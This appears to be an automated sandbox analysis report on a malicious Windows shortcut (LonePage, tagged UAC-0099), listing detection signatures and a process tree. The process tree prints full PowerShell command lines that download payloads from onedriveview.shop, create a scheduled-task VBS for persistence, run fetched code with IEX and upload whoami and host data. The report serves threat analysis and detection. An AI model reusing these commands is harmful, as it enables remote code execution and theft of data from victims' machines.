Windows
Analysis Report
XnQmVRj5g0.lnk
Overview
General Information
| Field | Value |
|---|---|
| Sample name | XnQmVRj5g0.lnk (renamed because the original name is a hash value) |
| Original sample name | b415741b40f9031d1810d06f0bcbcaa0d611c07ccbc3b04828ac779ee9e05a2a.lnk |
| Analysis ID | 1522698 |
| MD5 | 2fcd108de2e6877f79c4a05cb09488db |
| SHA1 | bf42aa0d6a60edee62736782933fb9212138e605 |
| SHA256 | b415741b40f9031d1810d06f0bcbcaa0d611c07ccbc3b04828ac779ee9e05a2a |
| Tags | lnk, UAC-0099, user-JAMESWT_MHT |
Detection
| Name | Score | Range | Whitelisted | Confidence |
|---|---|---|---|---|
| LonePage | 100 | 0 - 100 | false | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download payload from hardcoded c2 list
Windows shortcut file (LNK) starts blacklisted processes
Yara detected LonePage
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Machine Learning detection for sample
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- powershell.exe (PID: 5904 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGhibj1JRVggJGprcjskYmpkbys9JGhibnxPdXQtc3RyaW5nO1tieXRlW11dJGRycHk9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6VXRmOC5HZXRCeXRlcygkYmpkbyk7fTtzdGFydC1zbGVlcCAxMDskdWprPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDtzdGFydC1zbGVlcCAxNjskdWprLnVwbG9hZGRhdGEoJ2h0dHBzOi8vb25lZHJpdmV2aWV3LnNob3AvYXBpL3ZhbHVlcy9yZWZyZXNoODEnLCRkcnB5KTt9IgpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f; MD5: 04029E121A0CFA5991749937DD22A1D9)
  - conhost.exe (PID: 1200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - Acrobat.exe (PID: 7188 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\appdata\local\temp\sklyar.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
  - AcroCEF.exe (PID: 7468 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  - AcroCEF.exe (PID: 7720 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1588,i,905989185321007172,14586961761040631262,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  - schtasks.exe (PID: 7340 cmdline: "C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
- wscript.exe (PID: 7416 cmdline: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  - powershell.exe (PID: 7352 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);} MD5: 04029E121A0CFA5991749937DD22A1D9)
  - conhost.exe (PID: 1224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- svchost.exe (PID: 7548 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- wscript.exe (PID: 4864 cmdline: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  - powershell.exe (PID: 4016 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);} MD5: 04029E121A0CFA5991749937DD22A1D9)
  - conhost.exe (PID: 3824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- wscript.exe (PID: 6804 cmdline: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  - powershell.exe (PID: 7100 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);} MD5: 04029E121A0CFA5991749937DD22A1D9)
  - conhost.exe (PID: 724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_LonePage | Yara detected LonePage | Joe Security | |

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_LonePage | Yara detected LonePage | Joe Security | |
| | JoeSecurity_LonePage | Yara detected LonePage | Joe Security | |
| | JoeSecurity_LonePage | Yara detected LonePage | Joe Security | |
| | JoeSecurity_LonePage | Yara detected LonePage | Joe Security | |
| | JoeSecurity_LonePage | Yara detected LonePage | Joe Security | |

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | |